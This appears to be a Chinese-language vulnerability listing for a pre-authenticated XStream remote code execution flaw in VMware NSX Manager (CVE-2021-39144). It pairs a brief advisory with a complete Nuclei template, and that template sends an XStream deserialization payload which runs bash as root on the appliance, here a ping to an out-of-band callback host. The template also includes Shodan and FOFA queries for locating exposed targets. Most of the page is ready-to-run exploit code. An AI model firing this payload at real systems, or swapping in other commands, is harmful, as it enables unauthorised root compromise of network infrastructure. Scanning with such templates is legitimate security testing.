vmware-nsx-stream-rce: VMware NSX Manager XStream Pre-authenticated Remote Code Execution

日期: 2025-08-01 | 影响软件: VMware NSX | POC: 已公开

漏洞描述

VMware Cloud Foundation (NSX-V) contains a remote code execution vulnerability via XStream open source library. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation (NSX-V), a malicious actor can get remote code execution in the context of 'root' on the appliance. VMware Cloud Foundation 3.x and more specific NSX Manager Data Center for vSphere up to and including version 6.4.13 are vulnerable to Remote Command Injection.

PoC代码[已公开]

id: vmware-nsx-stream-rce

info:
  name: VMware NSX Manager XStream Pre-authenticated Remote Code Execution
  author: _0xf4n9x_
  severity: high
  description: |
    VMware Cloud Foundation (NSX-V) contains a remote code execution vulnerability via XStream open source library.
    VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.
    Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation (NSX-V),
    a malicious actor can get remote code execution in the context of 'root' on the appliance.
    VMware Cloud Foundation 3.x and more specific NSX Manager Data Center for vSphere up to and including version 6.4.13
    are vulnerable to Remote Command Injection.
  reference:
    - https://www.vmware.com/security/advisories/VMSA-2022-0027.html
    - https://kb.vmware.com/s/article/89809
    - https://srcincite.io/blog/2022/10/25/eat-what-you-kill-pre-authenticated-rce-in-vmware-nsx-manager.html
    - https://attackerkb.com/topics/ngprN6bu76/cve-2021-39144
    - https://github.com/rapid7/metasploit-framework/pull/17222
  metadata:
    verified: true
    max-request: 2
    shodan-query: title:"VMware Appliance Management"
    fofa-query: title="VMware Appliance Management"
  tags: vmware,xstream,rce,msf,intrusive,vuln
variables:
  lowerrstr: "{{to_lower(rand_text_alpha(6))}}"

http:
  - raw:
      - |-
        PUT /api/2.0/services/usermgmt/password/{{lowerrstr}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <sorted-set>
          <string>foo</string>
          <dynamic-proxy>
            <interface>java.lang.Comparable</interface>
            <handler class="java.beans.EventHandler">
              <target class="java.lang.ProcessBuilder">
                <command>
                  <string>bash</string>
                  <string>-c</string>
                  <string>ping {{os}}.{{interactsh-url}}</string>
                </command>
              </target>
              <action>start</action>
            </handler>
          </dynamic-proxy>
        </sorted-set>

    payloads:
      os:
        - '-c 3 lin'
        - '-n 3 win'
    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: body
        words:
          - 'deceptive request routing'

      - type: status
        status:
          - 400
# digest: 490a0046304402202afab17a9675d2720ed42d07c027810132a8c5b1373c0f77f0fad0cb6348bfff02201dd7f0fdc3b66527e0f9013cd9ca98c417fa143827856bfeda381329bf2bff3d:922c64590222798bb761d5b6d8e72950

相关漏洞推荐